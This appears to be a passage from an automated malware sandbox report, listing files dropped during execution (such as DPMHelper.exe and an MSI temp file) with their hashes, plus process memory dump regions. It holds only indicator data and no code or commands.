                                                                                                    • C:\Users\Admin\AppData\Roaming\United legacy corporation\Setup\jre\lib\images\cursors\invalid32x32.gif

                                                                                                      Filesize

                                                                                                      153B

                                                                                                      MD5

                                                                                                      1e9d8f133a442da6b0c74d49bc84a341

                                                                                                      SHA1

                                                                                                      259edc45b4569427e8319895a444f4295d54348f

                                                                                                      SHA256

                                                                                                      1a1d3079d49583837662b84e11d8c0870698511d9110e710eb8e7eb20df7ae3b

                                                                                                      SHA512

                                                                                                      63d6f70c8cab9735f0f857f5bf99e319f6ae98238dc7829dd706b7d6855c70be206e32e3e55df884402483cf8bebad00d139283af5c0b85dc1c5bf8f253acd37

                                                                                                    • C:\Users\Admin\AppData\Roaming\mwa_patchv3\DPMHelper.exe

                                                                                                      Filesize

                                                                                                      2.3MB

                                                                                                      MD5

                                                                                                      5d52ef45b6e5bf144307a84c2af1581b

                                                                                                      SHA1

                                                                                                      414a899ec327d4a9daa53983544245b209f25142

                                                                                                      SHA256

                                                                                                      26a24d3b0206c6808615c7049859c2fe62c4dcd87e7858be40ae8112b0482616

                                                                                                      SHA512

                                                                                                      458f47c1e4ccf41edaacc57abb663ee77ca098fffc596fad941bbdea67653aeabc79b34d607078b9ee5adb45614e26f5c28a09e8faf9532081fdd5dec9ac3c48

                                                                                                    • C:\Windows\Installer\MSI8BC4.tmp

                                                                                                      Filesize

                                                                                                      602KB

                                                                                                      MD5

                                                                                                      78b793e3f44b2c7849ffe70083c500c0

                                                                                                      SHA1

                                                                                                      9dcbb160c9f606bcdbee9ad572aaab1ad1b24d61

                                                                                                      SHA256

                                                                                                      fbcf7c3645d90621bfbbf38e660a510dd0731b02b6e7820b075116e944301174

                                                                                                      SHA512

                                                                                                      36d0fadd2a55231ce159519ca4bfb56fee038ee82bfbafa375faee17e11e2149ffffb4b364bc80e4ed950325e0c31e6a02244c591a0b983c7ccc039e94a3e9c8

                                                                                                    • \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

                                                                                                      Filesize

                                                                                                      24.6MB

                                                                                                      MD5

                                                                                                      1fdddc4b54bc628174fc3203b911c71e

                                                                                                      SHA1

                                                                                                      af3d8378ded446c2995ad006613ad02d268c397c

                                                                                                      SHA256

                                                                                                      f6926f5778fad2f8eb1d28021b216f7c23e0f1e69db74f51eb155c01679955d8

                                                                                                      SHA512

                                                                                                      db6451c8b04e82daab5cf85a6c0ac935195dcff3ccb9789f99cf71b2b1cce297e5fa9a53c8f0a0983ed2fe4a376cf7844234953dcf8de6e426c1a65bcf8f5a16

                                                                                                    • \??\Volume{8555371d-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{17cf8bf1-929f-411d-853b-a718664867c9}_OnDiskSnapshotProp

                                                                                                      Filesize

                                                                                                      6KB

                                                                                                      MD5

                                                                                                      3cf425d8bf67264b92b51eb28cd7ca0c

                                                                                                      SHA1

                                                                                                      9da160674ff6c724fb40cfde0c1087a24021adba

                                                                                                      SHA256

                                                                                                      f9f72937bd1e5f073893e9e1e303163260f53704d11b2299781dcbd3586f1a8d

                                                                                                      SHA512

                                                                                                      1e99808fa6b5111a76dc838ff99d5ab4ea3b5b93fa2413b23bfad96f27a55536e1677235d79972c6cfb9897d54280830e059e25c6e206265a8fb97874d00ec7c

                                                                                                    • memory/400-827-0x00000000065C0000-0x00000000065DE000-memory.dmp

                                                                                                      Filesize

                                                                                                      120KB

                                                                                                    • memory/400-792-0x00000000060F0000-0x0000000006156000-memory.dmp

                                                                                                      Filesize

                                                                                                      408KB

                                                                                                    • memory/400-773-0x0000000005230000-0x0000000005266000-memory.dmp

                                                                                                      Filesize

                                                                                                      216KB

                                                                                                    • memory/400-791-0x0000000005740000-0x0000000005762000-memory.dmp

                                                                                                      Filesize

                                                                                                      136KB

                                                                                                    • memory/400-795-0x00000000058E0000-0x0000000005946000-memory.dmp

                                                                                                      Filesize

                                                                                                      408KB

                                                                                                    • memory/400-815-0x0000000006160000-0x00000000064B7000-memory.dmp

                                                                                                      Filesize

                                                                                                      3.3MB

                                                                                                    • memory/400-828-0x0000000006770000-0x00000000067BC000-memory.dmp

                                                                                                      Filesize

                                                                                                      304KB

                                                                                                    • memory/400-868-0x0000000007EB0000-0x000000000852A000-memory.dmp

                                                                                                      Filesize

                                                                                                      6.5MB

                                                                                                    • memory/400-869-0x0000000006BF0000-0x0000000006C0A000-memory.dmp

                                                                                                      Filesize

                                                                                                      104KB

                                                                                                    • memory/2768-1565-0x0000000000880000-0x0000000000ADC000-memory.dmp

                                                                                                      Filesize

                                                                                                      2.4MB

                                                                                                    • memory/2768-1023-0x0000000000880000-0x0000000000ADC000-memory.dmp

                                                                                                      Filesize

                                                                                                      2.4MB

                                                                                                    • memory/3056-662-0x00000000008E0000-0x00000000008E1000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/3056-733-0x00000000008E0000-0x00000000008E1000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/3056-659-0x00000000008E0000-0x00000000008E1000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/3056-698-0x00000000008E0000-0x00000000008E1000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/3056-701-0x00000000008E0000-0x00000000008E1000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/3056-703-0x00000000008E0000-0x00000000008E1000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/3056-714-0x00000000008E0000-0x00000000008E1000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/3056-780-0x00000000008E0000-0x00000000008E1000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/3056-739-0x00000000008E0000-0x00000000008E1000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/3056-742-0x00000000008E0000-0x00000000008E1000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/3056-744-0x00000000008E0000-0x00000000008E1000-memory.dmp

                                                                                                      Filesize

                                                                                                      4KB

                                                                                                    • memory/3924-774-0x00000000050C0000-0x00000000056EA000-memory.dmp

                                                                                                      Filesize

                                                                                                      6.2MB

                                                                                                    • memory/3924-872-0x0000000007200000-0x0000000007292000-memory.dmp

                                                                                                      Filesize

                                                                                                      584KB

                                                                                                    • memory/3924-871-0x0000000007F50000-0x00000000084F6000-memory.dmp

                                                                                                      Filesize

                                                                                                      5.6MB

                                                                                                    • memory/4048-926-0x00000000075F0000-0x0000000007601000-memory.dmp

                                                                                                      Filesize

                                                                                                      68KB

                                                                                                    • memory/4048-917-0x00000000075C0000-0x00000000075D4000-memory.dmp

                                                                                                      Filesize

                                                                                                      80KB

                                                                                                    • memory/4048-902-0x0000000074760000-0x00000000747AC000-memory.dmp

                                                                                                      Filesize

                                                                                                      304KB

                                                                                                    • memory/4048-901-0x0000000006F80000-0x0000000006FB4000-memory.dmp

                                                                                                      Filesize

                                                                                                      208KB

                                                                                                    • memory/4048-912-0x0000000007090000-0x0000000007134000-memory.dmp

                                                                                                      Filesize

                                                                                                      656KB

                                                                                                    • memory/4048-913-0x00000000072A0000-0x00000000072AA000-memory.dmp

                                                                                                      Filesize

                                                                                                      40KB

                                                                                                    • memory/4048-914-0x00000000074C0000-0x0000000007556000-memory.dmp

                                                                                                      Filesize

                                                                                                      600KB

                                                                                                    • memory/4048-915-0x0000000007450000-0x0000000007472000-memory.dmp

                                                                                                      Filesize

                                                                                                      136KB

                                                                                                    • memory/4048-916-0x0000000007560000-0x0000000007584000-memory.dmp

                                                                                                      Filesize

                                                                                                      144KB

                                                                                                    • memory/4048-911-0x0000000006F60000-0x0000000006F7E000-memory.dmp

                                                                                                      Filesize

                                                                                                      120KB

                                                                                                    • memory/4048-1001-0x0000000007770000-0x0000000007785000-memory.dmp

                                                                                                      Filesize

                                                                                                      84KB

                                                                                                    • memory/4048-930-0x0000000007690000-0x00000000076A2000-memory.dmp

                                                                                                      Filesize

                                                                                                      72KB

                                                                                                    • memory/4048-931-0x0000000007670000-0x000000000767A000-memory.dmp

                                                                                                      Filesize

                                                                                                      40KB

                                                                                                    • memory/4048-991-0x0000000072A80000-0x0000000072DD7000-memory.dmp

                                                                                                      Filesize

                                                                                                      3.3MB

                                                                                                    • memory/4048-1000-0x00000000072A0000-0x00000000072AE000-memory.dmp

                                                                                                      Filesize

                                                                                                      56KB

                                                                                                    • memory/4048-1003-0x00000000077E0000-0x00000000077E8000-memory.dmp

                                                                                                      Filesize

                                                                                                      32KB

                                                                                                    • memory/4048-1002-0x00000000077B0000-0x00000000077CA000-memory.dmp

                                                                                                      Filesize

                                                                                                      104KB

                                                                                                    • memory/4276-625-0x0000000000400000-0x000000000041B000-memory.dmp

                                                                                                      Filesize

                                                                                                      108KB